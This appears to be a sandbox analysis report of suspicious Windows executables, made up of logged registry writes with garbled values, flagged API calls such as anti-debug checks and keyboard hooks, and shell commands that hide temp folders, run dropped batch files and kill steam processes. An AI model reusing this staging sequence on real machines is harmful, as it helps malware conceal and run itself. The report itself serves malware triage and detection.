HKCU\software\apcr::u1_1 腖ֆ RegNtPreCreateKey
HKCU\software\apcr::u2_1 唱牥 RegNtPreCreateKey
HKCU\software\apcr::u3_1 ᥜ獦 RegNtPreCreateKey
HKCU\software\apcr::u4_1 獵牥 RegNtPreCreateKey
HKCU\software\apcr::u1_2 마Ⱙ RegNtPreCreateKey
HKCU\software\apcr::u2_2 삮 RegNtPreCreateKey
HKCU\software\apcr::u3_2 賃 RegNtPreCreateKey
HKCU\software\apcr::u4_2  RegNtPreCreateKey
HKCU\software\apcr::u1_3 ൽጾ RegNtPreCreateKey
HKCU\software\apcr::u2_3 簛地 RegNtPreCreateKey
HKCU\software\apcr::u3_3 ぶ嘳 RegNtPreCreateKey
HKCU\software\apcr::u4_3 婟地 RegNtPreCreateKey
HKCU\software\apcr::u1_4 릮蟒 RegNtPreCreateKey
HKCU\software\apcr::u2_4 픃즕 RegNtPreCreateKey
HKCU\software\apcr::u3_4 ꟽ좖 RegNtPreCreateKey
HKCU\software\apcr::u4_4 췔즕 RegNtPreCreateKey
HKCU\software\apcr::u1_5 﫩⽒ RegNtPreCreateKey
HKCU\software\apcr::u2_5 斆㯻 RegNtPreCreateKey
HKCU\software\apcr::u3_5 ⭠㫸 RegNtPreCreateKey
HKCU\software\apcr::u4_5 䅉㯻 RegNtPreCreateKey
HKCU\software\apcr::u1_6 燖岩 RegNtPreCreateKey
HKCU\software\apcr::u2_6 鋺깠 RegNtPreCreateKey
HKCU\software\apcr::u3_6 RegNtPreCreateKey
HKCU\software\apcr::u4_6 뒾깠 RegNtPreCreateKey
HKCU\software\apcr::u1_7 뢍ꋗ RegNtPreCreateKey
HKCU\software\apcr::u2_7 㑈⃆ RegNtPreCreateKey
HKCU\software\apcr::u3_7 䈚⇅ RegNtPreCreateKey
HKCU\software\apcr::u4_7 ⠳⃆ RegNtPreCreateKey
HKCU\software\apcr::u1_8 㒩秚 RegNtPreCreateKey
HKCU\software\apcr::u2_8 蕾錫 RegNtPreCreateKey
HKCU\software\apcr::u3_8 鈨 RegNtPreCreateKey
HKCU\software\apcr::u4_8 鮨錫 RegNtPreCreateKey
HKCU\software\apcr::u1_9 헅䁟 RegNtPreCreateKey
HKCU\software\apcr::u2_9 ᖱ֑ RegNtPreCreateKey
HKCU\software\apcr::u3_9 攴Ғ RegNtPreCreateKey
HKCU\software\apcr::u4_9 ༝֑ RegNtPreCreateKey
HKCU\software\apcr::u1_10 蟬 RegNtPreCreateKey
HKCU\software\apcr::u2_10 饻矶 RegNtPreCreateKey
HKCU\software\apcr::u3_10 盵 RegNtPreCreateKey
HKCU\software\apcr::u4_10 芒矶 RegNtPreCreateKey
HKCU\software\apcr::u1_11 諍쿖 RegNtPreCreateKey
HKCU\software\apcr::u2_11  RegNtPreCreateKey
HKCU\software\apcr::u3_11 鰮 RegNtPreCreateKey
HKCU\software\apcr::u4_11  RegNtPreCreateKey
HKCU\software\apcr::u1_12 껼甥 RegNtPreCreateKey
HKCU\software\apcr::u2_12 炥峁 RegNtPreCreateKey
HKCU\software\apcr::u3_12 ͕巂 RegNtPreCreateKey
HKCU\software\apcr::u4_12 楼峁 RegNtPreCreateKey
HKCU\software\apcr::u1_13 ﯴଋ RegNtPreCreateKey
HKCU\software\apcr::u2_13 V켦 RegNtPreCreateKey
HKCU\software\apcr::u3_13 뛘츥 RegNtPreCreateKey
HKCU\software\apcr::u4_13 RegNtPreCreateKey
HKCU\software\apcr::u1_14 믁匐 RegNtPreCreateKey
HKCU\software\apcr::u2_14 䥄䆌 RegNtPreCreateKey
HKCU\software\apcr::u3_14 㩏䂏 RegNtPreCreateKey
HKCU\software\apcr::u4_14 偦䆌 RegNtPreCreateKey
HKCU\software\apcr::u1_15 鑡珑 RegNtPreCreateKey
HKCU\software\apcr::u2_15 돱 RegNtPreCreateKey
HKCU\software\apcr::u3_15 ꧲닲 RegNtPreCreateKey
HKCU\software\apcr::u4_15 쏛돱 RegNtPreCreateKey
HKCU\software\apcr::u1_16 ؾ爛 RegNtPreCreateKey
HKCU\software\apcr::u2_16 ⿻♗ RegNtPreCreateKey
HKCU\software\apcr::u3_16 嵹❔ RegNtPreCreateKey
HKCU\software\apcr::u4_16 㝐♗ RegNtPreCreateKey
HKCU\software\apcr::u1_17 ֮弧 RegNtPreCreateKey
HKCU\software\apcr::u2_17 褂颼 RegNtPreCreateKey
HKCU\software\apcr::u3_17 샬馿 RegNtPreCreateKey
HKCU\software\apcr::u4_17 ꫅颼 RegNtPreCreateKey
HKCU\software\apcr::u1_18 RegNtPreCreateKey
HKCU\software\apcr::u2_18 ߣଢ RegNtPreCreateKey
HKCU\software\apcr::u3_18 琓ਡ RegNtPreCreateKey
HKCU\software\apcr::u4_18 Ḻଢ RegNtPreCreateKey
HKCU\software\apcr::u1_19 ᴯỦ RegNtPreCreateKey
HKCU\software\apcr::u2_19 袍綇 RegNtPreCreateKey
HKCU\software\apcr::u3_19 ﮆ粄 RegNtPreCreateKey
HKCU\software\apcr::u4_19 醯綇 RegNtPreCreateKey
HKCU\software\apcr::u1_20 행ᴈ RegNtPreCreateKey
HKCU\software\apcr::u2_20 ᷉ RegNtPreCreateKey
HKCU\software\apcr::u3_20 漍 RegNtPreCreateKey
HKCU\software\apcr::u4_20 Ԥ RegNtPreCreateKey
HKCU\software\apcr::u1_21 䌒湷 RegNtPreCreateKey
HKCU\software\apcr::u2_21 慀扒 RegNtPreCreateKey
HKCU\software\apcr::u3_21 ኰ捑 RegNtPreCreateKey
HKCU\software\apcr::u4_21 碙扒 RegNtPreCreateKey
HKCU\software\apcr::u1_22 RegNtPreCreateKey
HKCU\software\apcr::u2_22 쿉풷 RegNtPreCreateKey
HKCU\software\apcr::u3_22 蘧햴 RegNtPreCreateKey
HKCU\software\apcr::u4_22 풷 RegNtPreCreateKey
HKCU\software\apcr::u1_23 錄퍸 RegNtPreCreateKey
HKCU\software\apcr::u2_23 䙚䜝 RegNtPreCreateKey
HKCU\software\apcr::u3_23 㖪䘞 RegNtPreCreateKey
HKCU\software\apcr::u4_23 徃䜝 RegNtPreCreateKey
HKCU\software\apcr::u1_24 逯 RegNtPreCreateKey
HKCU\software\apcr::u2_24 쭢릂 RegNtPreCreateKey
HKCU\software\apcr::u3_24 룑뢁 RegNtPreCreateKey
HKCU\software\apcr::u4_24 틸릂 RegNtPreCreateKey
HKCU\software\apcr::u1_25 둆㸪 RegNtPreCreateKey
HKCU\software\apcr::u2_25 崘⯨ RegNtPreCreateKey
HKCU\software\apcr::u3_25 ⱄ⫫ RegNtPreCreateKey
HKCU\software\apcr::u4_25 䙭⯨ RegNtPreCreateKey
HKCU\software\apcr::u1_26 籨苑 RegNtPreCreateKey
HKCU\software\apcr::u2_26 ꀻ鹍 RegNtPreCreateKey
HKCU\software\apcr::u3_26 폋齎 RegNtPreCreateKey
HKCU\software\apcr::u4_26 맢鹍 RegNtPreCreateKey
HKCU\software\apcr::u1_27 泈텺 RegNtPreCreateKey
HKCU\software\apcr::u2_27 㗼Ⴓ RegNtPreCreateKey
HKCU\software\apcr::u3_27 䝾ᆰ RegNtPreCreateKey
HKCU\software\apcr::u4_27 ⵗႳ RegNtPreCreateKey
HKCU\software\apcr::u1_28 Ж짃 RegNtPreCreateKey
HKCU\software\apcr::u2_28 耳茘 RegNtPreCreateKey
HKCU\software\apcr::u3_28 쫥舛 RegNtPreCreateKey
HKCU\software\apcr::u4_28 ꃌ茘 RegNtPreCreateKey
HKCU\software\apcr::u1_29 삓蟧 RegNtPreCreateKey
HKCU\software\apcr::u2_29 ග RegNtPreCreateKey
HKCU\software\apcr::u3_29 繨 RegNtPreCreateKey
HKCU\software\apcr::u4_29 ᑁ RegNtPreCreateKey
HKCU\software\apcr::u1_30 磑⢤ RegNtPreCreateKey
HKCU\software\apcr::u2_30 鵇柣 RegNtPreCreateKey
HKCU\software\apcr::u3_30 曠 RegNtPreCreateKey
HKCU\software\apcr::u4_30 螶柣 RegNtPreCreateKey
HKCU\software\apcr::u1_31 ï쬟 RegNtPreCreateKey
HKCU\software\apcr::u2_31 RegNtPreCreateKey
HKCU\software\apcr::u3_31 RegNtPreCreateKey
HKCU\software\apcr::u4_31 RegNtPreCreateKey
HKCU\software\apcr::u1_32 RegNtPreCreateKey
HKCU\software\apcr::u2_32 璹䲮 RegNtPreCreateKey
HKCU\software\apcr::u3_32 ҉䶭 RegNtPreCreateKey
HKCU\software\apcr::u4_32 溠䲮 RegNtPreCreateKey
HKCU\software\apcr::u1_33 ⢵迵 RegNtPreCreateKey
HKCU\software\apcr::u2_33 쀈뼓 RegNtPreCreateKey
HKCU\software\apcr::u3_33 蠼븐 RegNtPreCreateKey
HKCU\software\apcr::u4_33 뼓 RegNtPreCreateKey
HKCU\software\apcr::u1_34 썒 RegNtPreCreateKey
HKCU\software\apcr::u2_34 䢁ㅹ RegNtPreCreateKey
HKCU\software\apcr::u3_34 㾣ぺ RegNtPreCreateKey
HKCU\software\apcr::u4_34 喊ㅹ RegNtPreCreateKey
HKCU\software\apcr::u1_35 ࠬ㊓ RegNtPreCreateKey
HKCU\software\apcr::u2_35 푼ꏞ RegNtPreCreateKey
HKCU\software\apcr::u3_35 ꋖꋝ RegNtPreCreateKey
HKCU\software\apcr::u4_35 죿ꏞ RegNtPreCreateKey
HKCU\software\apcr::u1_36 ⳃ⦩ RegNtPreCreateKey
HKCU\software\apcr::u2_36 ⛋ᙄ RegNtPreCreateKey
HKCU\software\apcr::u3_36 噝ᝇ RegNtPreCreateKey
HKCU\software\apcr::u4_36 㱴ᙄ RegNtPreCreateKey
HKCU\software\apcr::u1_37 èꥆ RegNtPreCreateKey
HKCU\software\apcr::u2_37 넿袩 RegNtPreCreateKey
HKCU\software\apcr::u3_37 엀親 RegNtPreCreateKey
HKCU\software\apcr::u4_37 꿩袩 RegNtPreCreateKey
HKCU\software\apcr::u1_38 뎄뀱 RegNtPreCreateKey
HKCU\software\apcr::u2_38 ﬏ RegNtPreCreateKey
HKCU\software\apcr::u3_38 䥷兀 RegNtPreCreateKey
HKCU\software\apcr::u4_38 ⍞﬏ RegNtPreCreateKey
HKCU\software\apcr::u1_39 㿒付 RegNtPreCreateKey
HKCU\software\apcr::u2_39 詭浴 RegNtPreCreateKey
HKCU\software\apcr::u3_39 ﳺ汷 RegNtPreCreateKey
HKCU\software\apcr::u4_39 雓浴 RegNtPreCreateKey
HKCU\software\apcr::u1_40 ﹴ뼖 RegNtPreCreateKey
HKCU\software\apcr::u2_40 RegNtPreCreateKey
HKCU\software\apcr::u3_40 RegNtPreCreateKey
HKCU\software\apcr::u4_40 RegNtPreCreateKey
HKCU\software\apcr::u1_41 RegNtPreCreateKey
HKCU\software\apcr::u2_41 朞刿 RegNtPreCreateKey
HKCU\software\apcr::u3_41 ប匼 RegNtPreCreateKey
HKCU\software\apcr::u4_41 綽刿 RegNtPreCreateKey
HKCU\software\apcr::u1_42 ŝ瓦 RegNtPreCreateKey
HKCU\software\apcr::u2_42 쒤 RegNtPreCreateKey
HKCU\software\apcr::u3_42 鬛얧 RegNtPreCreateKey
HKCU\software\apcr::u4_42 쒤 RegNtPreCreateKey
HKCU\software\apcr::u1_43 ⾔씿 RegNtPreCreateKey

47 additional registry modifications are not displayed above.

Windows API Usage

Category API
Process Shell Execute
  • CreateProcess
  • ShellExecuteEx
  • WriteConsole
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Other Suspicious
  • AdjustTokenPrivileges
  • SetWindowsHookEx
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelTimer2
Show More
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtTraceEvent

26 additional items are not displayed above.

Encryption Used
  • BCryptOpenAlgorithmProvider
Process Manipulation Evasion
  • NtUnmapViewOfSection
Keyboard Access
  • GetKeyState
Process Terminate
  • TerminateProcess

Shell Command Execution

C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Nkdmgfwv\AppData\Local\Temp\afolder" mkdir "C:\Users\Nkdmgfwv\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp" mkdir "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp\tmp2978.bat" del "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp\tmp2978.bat"
Show More
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp\tmp2978.exe" del "C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp\tmp2978.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Nkdmgfwv\AppData\Local\Temp\ytmp\tmp2978.bat "c:\users\user\downloads\f4ae1c95d8e433c9f231de206df5af8a38144ff6_0000243926.exe"
C:\WINDOWS\system32\fc.exe fc .\left4dead2\steam.inf .\bin\tools\steam.inf
C:\WINDOWS\system32\taskkill.exe taskkill /F /T /IM steam*
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Omtkkorz\AppData\Local\Temp\afolder" mkdir "C:\Users\Omtkkorz\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp" mkdir "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Omtkkorz\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Omtkkorz\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c cls
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp\tmp13145.bat" del "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp\tmp13145.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp\tmp13145.exe" del "C:\Users\Omtkkorz\AppData\Local\Temp\ytmp\tmp13145.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Omtkkorz\AppData\Local\Temp\ytmp\tmp13145.bat "c:\users\user\downloads\882d77e6403e26041c7f9f2eed621472d00cad86_0000100724.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Ldatfkwh\AppData\Local\Temp\myfiles" mkdir "C:\Users\Ldatfkwh\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Ldatfkwh\AppData\Local\Temp\wxy" mkdir "C:\Users\Ldatfkwh\AppData\Local\Temp\wxy"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Ldatfkwh\AppData\Local\Temp\wxy
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Ldatfkwh\AppData\Local\Temp\wxy
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Ldatfkwh\AppData\Local\Temp\is64.txt
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Ldatfkwh\AppData\Local\Temp\is64.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c pause
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Qeudlcvi\AppData\Local\Temp\afolder" mkdir "C:\Users\Qeudlcvi\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp" mkdir "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp\tmp6076sers\user\downloads\.bat" del "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp\tmp6076sers\user\downloads\.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp\tmp6076sers\user\downloads\.exe" del "C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp\tmp6076sers\user\downloads\.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Qeudlcvi\AppData\Local\Temp\ytmp\tmp6076sers\user\downloads\.bat "c:\users\user\downloads\ace8cea3d032d411e91b42411060cd0e8d524685_0000100228"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c mode con:cols=0120 lines=0030
C:\WINDOWS\system32\mode.com mode con:cols=0120 lines=0030
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c title Window Title
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Mzuqfwkt\AppData\Local\Temp\myfiles" mkdir "C:\Users\Mzuqfwkt\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Mzuqfwkt\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Mzuqfwkt\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Mzuqfwkt\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Mzuqfwkt\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Mzuqfwkt\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Mzuqfwkt\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Gloegmca\AppData\Local\Temp\myfiles" mkdir "C:\Users\Gloegmca\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Gloegmca\AppData\Local\Temp\wxy" mkdir "C:\Users\Gloegmca\AppData\Local\Temp\wxy"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Gloegmca\AppData\Local\Temp\wxy
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Gloegmca\AppData\Local\Temp\wxy
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Gloegmca\AppData\Local\Temp\is64.txt
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Gloegmca\AppData\Local\Temp\is64.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Igjbguvk\AppData\Local\Temp\afolder" mkdir "C:\Users\Igjbguvk\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Igjbguvk\AppData\Local\Temp\ytmp" mkdir "C:\Users\Igjbguvk\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Igjbguvk\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Igjbguvk\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Wbmhmubu\AppData\Local\Temp\afolder" mkdir "C:\Users\Wbmhmubu\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp" mkdir "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Wbmhmubu\AppData\Local\Temp\is64.txt
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Wbmhmubu\AppData\Local\Temp\is64.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.bat" del "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.exe" del "C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\Sysnative\cmd.exe /C C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.bat "c:\users\user\downloads\6b5061dfaebc63e9503c93015d79d54dad15c7c6_0000090366"
C:\WINDOWS\Sysnative\cmd.exe C:\WINDOWS\Sysnative\cmd.exe /C C:\Users\Wbmhmubu\AppData\Local\Temp\ytmp\tmp65095.bat "c:\users\user\downloads\6b5061dfaebc63e9503c93015d79d54dad15c7c6_0000090366"
C:\WINDOWS\system32\mode.com mode con:cols=80 lines=25
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Soedbfsj\AppData\Local\Temp\afolder" mkdir "C:\Users\Soedbfsj\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp" mkdir "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Soedbfsj\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Soedbfsj\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp\tmp36895ers\user\downloads\.bat" del "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp\tmp36895ers\user\downloads\.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp\tmp36895ers\user\downloads\.exe" del "C:\Users\Soedbfsj\AppData\Local\Temp\ytmp\tmp36895ers\user\downloads\.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Soedbfsj\AppData\Local\Temp\ytmp\tmp36895ers\user\downloads\.bat "c:\users\user\downloads\33c2ca6c52a47b6a9810f8791282df89af16ddba_0000098532"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Iuofgedh\AppData\Local\Temp\afolder" mkdir "C:\Users\Iuofgedh\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp" mkdir "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Iuofgedh\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Iuofgedh\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp\tmp16475.bat" del "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp\tmp16475.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp\tmp16475.exe" del "C:\Users\Iuofgedh\AppData\Local\Temp\ytmp\tmp16475.exe"
